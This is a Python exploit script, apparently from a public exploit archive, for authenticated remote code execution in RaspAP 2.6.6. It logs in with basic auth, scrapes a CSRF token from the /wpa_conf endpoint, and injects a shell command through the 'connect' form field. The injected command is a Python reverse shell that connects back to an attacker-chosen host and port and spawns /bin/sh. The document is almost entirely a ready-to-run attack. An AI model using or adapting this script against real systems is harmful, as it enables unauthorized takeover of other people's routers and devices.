RaspAP version 2.6.6 authenticated remote code execution exploit.
a517b2710cc2459f554ac3fb1dfda2e8
# Exploit Title: RaspAP 2.6.6 - Remote Code Execution (RCE) (Authenticated)
# Date: 23.08.2021
# Exploit Author: Moritz Gruber <[email protected]>
# Vendor Homepage: https://raspap.com/
# Software Link: https://github.com/RaspAP/raspap-webgui
# Version: 2.6.6
# Tested on: Linux raspberrypi 5.10.52-v7+
import requests
from requests.api import post
from requests.auth import HTTPBasicAuth
from bs4 import BeautifulSoup
import sys, re
if len(sys.argv) != 7:
print("python3 exec-raspap.py <target-host> <target-port> <username> <password> <reverse-host> <reverse-port>")
sys.exit()
else:
target_host = sys.argv[1]
target_port = sys.argv[2]
username = sys.argv[3]
password = sys.argv[4]
listener_host = sys.argv[5]
listener_port = sys.argv[6]
endpoint = "/wpa_conf"
exploit = f"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{listener_host}\",{listener_port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
url = "http://{}:{}/{}".format(target_host,target_port,endpoint)
s = requests.Session()
get_Request = s.get(url, auth=HTTPBasicAuth(username, password))
soup = BeautifulSoup(get_Request.text, "lxml")
csrf_token = soup.find("meta",{"name":"csrf_token"}).get("content")
post_data = {
"csrf_token": csrf_token,
"connect": "wlan; {}".format(exploit)
}
post_Request = s.post(url, data=post_data, auth=HTTPBasicAuth(username, password))
if post_Request.status_code:
print("Exploit send.")
else:
print("Something went wrong.")
print("Done")